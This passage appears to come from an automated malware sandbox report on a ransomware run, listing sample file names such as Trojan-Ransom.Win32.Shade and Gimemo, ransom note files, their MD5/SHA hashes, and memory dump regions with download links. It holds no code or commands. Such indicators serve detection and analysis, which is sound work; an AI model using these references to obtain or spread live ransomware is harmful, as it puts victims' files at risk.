                                                                                e3371a68c69ee488374ab70dde0eb3077236c8fc69e71afd87833e41f2df550a

                                                                                SHA512

                                                                                48bb9114e2faf800dd40d0453b3ef6140180215ce18bc560bb9b4fa342d9192fded99e433a525571bb15e5a7bcf99cf9ebb2909f679673c942ecf31677190b8c

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.GenericCryptor.cys-67e47d1f3dc371d5d4af3587003bd56949053ed2df6a0ee54f0b495a7a795b5b.exe
                                                                                Filesize

                                                                                513KB

                                                                                MD5

                                                                                e009019ba94e5abf63fe9cfd91d9f701

                                                                                SHA1

                                                                                1c8fab7e36cabad565e04e5b75ba66e6d5da4fa5

                                                                                SHA256

                                                                                5dd016360b21f3ef9425160fc8dc7381a6486447d6d45770cfb5557052f69477

                                                                                SHA512

                                                                                18adc7e46e4772ca213adff763bc0dbcb4e64949934ca6927e139dc8174a4d11e3982af99a1d6683bbcebe9243ac6740c2bb275a1636868ae8da150a92a85e8f

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.GenericCryptor.czo-8f0eb6d60211c9c8752aab9eca3e01ce08832792d355fdc7f7c420057a3c4a4f.exe
                                                                                Filesize

                                                                                183KB

                                                                                MD5

                                                                                7b690df13e4583aa153e1ab75552c26a

                                                                                SHA1

                                                                                925af01bb854f0c77d28c538fe748cba69ffa4e2

                                                                                SHA256

                                                                                b06b3e2af4c91ff3d040cc7c26c86bcef070d326fcf4e97c5807ce4bbf3297ef

                                                                                SHA512

                                                                                92a48045702aee8f3ce794ec6f7fdb1995ebda2cc9b11bdb7099cb8856b9d69812bc3ae177888b6f94e286129d253cac94d25b9df83c8c5728d37ef35ecb3bfb

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.Gimemo.bauh-6410b7cf9fb3f537b21a592172722354c2499088fef372be0cb5668e48374317.exe
                                                                                Filesize

                                                                                271KB

                                                                                MD5

                                                                                547140b87c760541fc9a5b80f48b7ae7

                                                                                SHA1

                                                                                0b206771e8dab60f1318f73f906cf3988384bb18

                                                                                SHA256

                                                                                07cc0a768c119fea08ef34c992568e3d4ec503f9e8c019b65a7c0006e1798fb6

                                                                                SHA512

                                                                                4272cdcc89213528791014ab1ee036fa9cb81c0af5673c25813d39b9a4649514ea054e9d4450610dccb688a78a3d05d63a5ce4774e4010074b24dbf6f5351bef

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.Gimemo.cdqu-c9d8939dcde974745d159c362542b82801978d5b6ef75fe035e0c66e21e1d7e4.exe
                                                                                Filesize

                                                                                436KB

                                                                                MD5

                                                                                6f97a67c25a19aa88ce52a2fda807493

                                                                                SHA1

                                                                                20749525fbfacef0b73096c6ae287040fa583eb7

                                                                                SHA256

                                                                                8f62bf6aaac8c81ea986f2595b52c16cd0db205bdd52168701ec3c8d907cf256

                                                                                SHA512

                                                                                78fcdcb4e148e1f2e3320b7f9fd49d91185cbb65f005cb5023fcdb2b92d56cde2801e6b4af6495f9eef4fe7d6da238c96b88d3c117b18296d6d155a4b7c4fba2

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.Phpw.afo-cefd6746793f47d9e8ea7cea0c38f9030ad99bd7e9336d0e875099ef7b4adbdc.exe
                                                                                Filesize

                                                                                2.6MB

                                                                                MD5

                                                                                4516b46577b4637ed54d45e1a3710f36

                                                                                SHA1

                                                                                900482fc7fefd295453be2b723d82690bdd29bef

                                                                                SHA256

                                                                                3796393a2ef5b556923ba507cab9583e793c97fff51a72cb8a9144f8ba3d3879

                                                                                SHA512

                                                                                2cf0abb9d7e6f71a312377b31a85c34419c908be62df5e96967ad9e685ec8c04db11679e46c7ba5b483c2340f3418e568c87b2f6c992d82755362cc775f1754a

                                                                                Download Submit

                                                                              • C:\Users\Admin\Desktop\00438\Trojan-Ransom.Win32.Shade.pea-9f1fc4c5a652beb2161d1461985ebb812852f5b8c3837123794c71d72f90cd08.exe
                                                                                Filesize

                                                                                1.7MB

                                                                                MD5

                                                                                6a7a087a931a1e85cb86dab12efaa634

                                                                                SHA1

                                                                                3ee46cb833fd264546f7ef6a108b62cab5590b5e

                                                                                SHA256

                                                                                f72a74444b03176d58cff4626c95a7930e785a001b2b8ff9cdc41d6a7eec3cdc

                                                                                SHA512

                                                                                a0f7b6d1333e67e524caeed58606db3beb674500dc526db4d6e8b63254738181b698dd396d7ad338d6d18f64172d748e0bcb3ac7d7a08e55d55ba5880a5138ba

                                                                                Download Submit

                                                                              • C:\Users\Admin\Documents\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d70138bbb3687aa31b35ff4aadac1ffe6569de225981f299b8853bc69c0fc39e .pdf
                                                                                Filesize

                                                                                812KB

                                                                                MD5

                                                                                953c6f80bc2f530031d61f226748fca1

                                                                                SHA1

                                                                                7be7bcb9d909f429a5f41f34035a54a984db2457

                                                                                SHA256

                                                                                d30606226b4116872b3a80fcd108b65eef27273463513cb23ceda210c20c564c

                                                                                SHA512

                                                                                24a0bb51d8367333ff41c2bf16b6eea2ea88fbf4fcfc77fdc9235bce4dcb6ad46e5f75540facac5cd1545b79f47673a6d92d4d68379a653ba6e69434eb731bc7

                                                                                Download Submit

                                                                              • C:\Users\Admin\Documents\Qpinj_readme_.txt
                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                4cbeec276e5cce98bf9a1ceeacc45865

                                                                                SHA1

                                                                                3fe537c0d7b9a512b6d9476de437b35f199ad31e

                                                                                SHA256

                                                                                02ecdde5869bae254d7262f3ec363a94265018182c8059eb336f35c03ee15dce

                                                                                SHA512

                                                                                92d6b4bfb949015867d39145707b612aa307f1c46c5562164ca07f255a3e2a09cef286632b1e0532384e2865ac0c8d13719eb3a451b88f92778642e07b519b62

                                                                                Download Submit

                                                                              • C:\Users\Admin\Music\Qpinj_readme_.txt
                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                f1a566ef1f7189eb77a4874d6553bc9d

                                                                                SHA1

                                                                                a2c97c56982914531093c9181bf4ab20b32c5299

                                                                                SHA256

                                                                                934bd0825450224961bad2e3664f1eee1dfcd85d05d167625d6fba6117afe42a

                                                                                SHA512

                                                                                98b39e5e9a051a101e262c803f7ad35869e8594e296aa067361952525f28977f79f4b3407d1b9aea15ba3d3e2f0da8d4119c1136f121c3c7d012141569588653

                                                                                Download Submit

                                                                              • F:\!=READMY=!.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                3a9c9e04177e5df8dfbdf7a308ed4434

                                                                                SHA1

                                                                                b25f75dd002016520e1ffc40e260c1415b132e49

                                                                                SHA256

                                                                                aaddf2d48bd8726d38a0ef5a597affa659671a33b9e1b3a33f8ca9ee73a98f9e

                                                                                SHA512

                                                                                505c788f22ba2ceac3ac0d1aaddc03e29e0196b0d1f2bf22fb08c8044e27407237add8bb6be72dbe065acb091f9b7b5876306514b80b374bd681db0721fbfdba

                                                                                Download Submit

                                                                              • \??\Z:\$RECYCLE.BIN\S-1-5-21-3442511616-637977696-3186306149-1000\desktop.ini
                                                                                Filesize

                                                                                649B

                                                                                MD5

                                                                                a39fc83bba62d97c0a064b5d0add361b

                                                                                SHA1

                                                                                0fc2d4720db88b511f2020d25b5381c5f0aaa66f

                                                                                SHA256

                                                                                10375282121c0d6c3dd5a22aff7ab4ca09763ca95da10ba473b5963b71fdd6b2

                                                                                SHA512

                                                                                9087bfac7c555648003d9ea108370c88ecfada6ee5c95471b16093b8b098422d3215ecb40314f7f878093aa2a47c0b468f7c009ef2c8be4d9904a5bcb2985813

                                                                                Download Submit

                                                                              • \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-3442511616-637977696-3186306149-1000\desktop.ini
                                                                                Filesize

                                                                                129B

                                                                                MD5

                                                                                a526b9e7c716b3489d8cc062fbce4005

                                                                                SHA1

                                                                                2df502a944ff721241be20a9e449d2acd07e0312

                                                                                SHA256

                                                                                e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                SHA512

                                                                                d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                Download Submit

                                                                              • memory/408-7919-0x0000000005790000-0x00000000057B2000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                                Download

                                                                              • memory/408-7448-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

                                                                                Filesize

                                                                                32KB

                                                                                Download

                                                                              • memory/408-186-0x0000000000B00000-0x0000000000B26000-memory.dmp

                                                                                Filesize

                                                                                152KB

                                                                                Download

                                                                              • memory/408-190-0x0000000005350000-0x00000000053B6000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                                Download

                                                                              • memory/408-7450-0x0000000001190000-0x00000000011AE000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                                Download

                                                                              • memory/1160-3229-0x0000000000600000-0x0000000000784000-memory.dmp

                                                                                Filesize

                                                                                1.5MB

                                                                                Download

                                                                              • memory/1160-5110-0x00000000027A0000-0x0000000002816000-memory.dmp

                                                                                Filesize

                                                                                472KB

                                                                                Download

                                                                              • memory/1308-163-0x000001BD74790000-0x000001BD747D4000-memory.dmp

                                                                                Filesize

                                                                                272KB

                                                                                Download

                                                                              • memory/1308-166-0x000001BD74820000-0x000001BD7483E000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                                Download

                                                                              • memory/1308-154-0x000001BD742D0000-0x000001BD742F2000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                                Download

                                                                              • memory/1308-164-0x000001BD74860000-0x000001BD748D6000-memory.dmp

                                                                                Filesize

                                                                                472KB

                                                                                Download

                                                                              • memory/1936-6710-0x000000001C9A0000-0x000000001C9B2000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                                Download

                                                                              • memory/1936-7518-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

                                                                                Filesize

                                                                                32KB

                                                                                Download

                                                                              • memory/2724-109-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-100-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-102-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-101-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-106-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-107-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-108-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-112-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-110-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/2724-111-0x000001F871E70000-0x000001F871E71000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                                Download

                                                                              • memory/3048-196-0x0000000004C80000-0x0000000004C8A000-memory.dmp

                                                                                Filesize

                                                                                40KB

                                                                                Download

                                                                              • memory/3048-192-0x0000000004CC0000-0x0000000004D52000-memory.dmp

                                                                                Filesize

                                                                                584KB

                                                                                Download

                                                                              • memory/3048-191-0x0000000005270000-0x0000000005814000-memory.dmp

                                                                                Filesize

                                                                                5.6MB

                                                                                Download

                                                                              • memory/3048-188-0x0000000000270000-0x00000000003C2000-memory.dmp

                                                                                Filesize

                                                                                1.3MB

                                                                                Download

                                                                              • memory/3312-7531-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7530-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7535-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7532-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7520-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7528-0x0000026C321D0000-0x0000026C321E4000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                                Download

                                                                              • memory/3312-7527-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7533-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/3312-7534-0x0000000140000000-0x000000014072E000-memory.dmp

                                                                                Filesize

                                                                                7.2MB

                                                                                Download

                                                                              • memory/4056-220-0x00000000020A0000-0x00000000020B7000-memory.dmp

                                                                                Filesize

                                                                                92KB

                                                                                Download

                                                                              • memory/4056-206-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                Filesize

                                                                                384KB

                                                                                Download

                                                                              • memory/4056-219-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                Filesize

                                                                                384KB

                                                                                Download

                                                                              • memory/4164-189-0x0000000000770000-0x0000000000792000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                                Download

                                                                              • memory/4292-173-0x0000000000700000-0x00000000008F8000-memory.dmp

                                                                                Filesize

                                                                                2.0MB

                                                                                Download

                                                                              • memory/4324-240-0x0000000000400000-0x000000000055B000-memory.dmp

                                                                                Filesize

                                                                                1.4MB

                                                                                Download

                                                                              • memory/4324-228-0x0000000000400000-0x000000000055B000-memory.dmp

                                                                                Filesize

                                                                                1.4MB

                                                                                Download

                                                                              • memory/4324-229-0x0000000000700000-0x0000000000717000-memory.dmp

                                                                                Filesize

                                                                                92KB

                                                                                Download

                                                                              • memory/4380-202-0x0000000005730000-0x00000000057CC000-memory.dmp

                                                                                Filesize

                                                                                624KB

                                                                                Download

                                                                              • memory/4380-187-0x0000000000AA0000-0x0000000000BEA000-memory.dmp

                                                                                Filesize

                                                                                1.3MB

                                                                                Download

                                                                              • memory/4380-200-0x00000000078E0000-0x0000000007980000-memory.dmp

                                                                                Filesize

                                                                                640KB

                                                                                Download

                                                                              • memory/5692-270-0x0000000000070000-0x00000000001A6000-memory.dmp

                                                                                Filesize

                                                                                1.2MB

                                                                                Download

                                                                              • memory/8736-8848-0x0000000007350000-0x0000000007376000-memory.dmp

                                                                                Filesize

                                                                                152KB

                                                                                Download

                                                                              • memory/8736-8838-0x000000006E330000-0x000000006E37C000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                                Download

                                                                              • memory/8848-8039-0x0000000006280000-0x00000000062CC000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                                Download

                                                                              • memory/8848-8130-0x000000006E380000-0x000000006E6D4000-memory.dmp

                                                                                Filesize

                                                                                3.3MB

                                                                                Download

                                                                              • memory/8848-8088-0x000000006E330000-0x000000006E37C000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                                Download

                                                                              • memory/8848-8087-0x0000000006EC0000-0x0000000006EF2000-memory.dmp

                                                                                Filesize

                                                                                200KB

                                                                                Download

                                                                              • memory/8848-8098-0x00000000062F0000-0x000000000630E000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                                Download

                                                                              • memory/8848-8099-0x0000000006F00000-0x0000000006FA3000-memory.dmp

                                                                                Filesize

                                                                                652KB

                                                                                Download

                                                                              • memory/8848-8101-0x0000000007020000-0x000000000703A000-memory.dmp

                                                                                Filesize

                                                                                104KB

                                                                                Download

                                                                              • memory/8848-8100-0x0000000007670000-0x0000000007CEA000-memory.dmp

                                                                                Filesize

                                                                                6.5MB

                                                                                Download

                                                                              • memory/8848-8106-0x0000000007090000-0x000000000709A000-memory.dmp

                                                                                Filesize

                                                                                40KB

                                                                                Download

                                                                              • memory/8848-8129-0x0000000007240000-0x0000000007264000-memory.dmp

                                                                                Filesize

                                                                                144KB

                                                                                Download

                                                                              • memory/8848-8128-0x0000000007210000-0x000000000723A000-memory.dmp

                                                                                Filesize

                                                                                168KB

                                                                                Download

                                                                              • memory/8848-8033-0x0000000005D00000-0x0000000005D1E000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                                Download

                                                                              • memory/8848-7967-0x00000000023D0000-0x0000000002406000-memory.dmp

                                                                                Filesize

                                                                                216KB

                                                                                Download

                                                                              • memory/8848-7968-0x0000000004EF0000-0x0000000005518000-memory.dmp

                                                                                Filesize

                                                                                6.2MB

                                                                                Download

                                                                              • memory/8848-7972-0x0000000005620000-0x0000000005686000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                                Download

                                                                              • memory/8848-7971-0x0000000005580000-0x00000000055A2000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                                Download

                                                                              • memory/8848-7979-0x0000000005770000-0x0000000005AC4000-memory.dmp

                                                                                Filesize

                                                                                3.3MB

                                                                                Download

                                                                              • memory/10080-8231-0x0000000007F90000-0x0000000007FAA000-memory.dmp

                                                                                Filesize

                                                                                104KB

                                                                                Download

                                                                              • memory/10080-8233-0x0000000007F70000-0x0000000007F78000-memory.dmp

                                                                                Filesize

                                                                                32KB

                                                                                Download

                                                                              • memory/10080-8224-0x0000000007E90000-0x0000000007EA4000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                                Download

                                                                              • memory/10080-8223-0x0000000007E80000-0x0000000007E8E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                                Download

                                                                              • memory/10080-8164-0x0000000007E50000-0x0000000007E61000-memory.dmp

                                                                                Filesize

                                                                                68KB

                                                                                Download

                                                                              • memory/10080-8163-0x0000000007ED0000-0x0000000007F66000-memory.dmp

                                                                                Filesize

                                                                                600KB

                                                                                Download

                                                                              • memory/10080-8150-0x000000006E330000-0x000000006E37C000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                                Download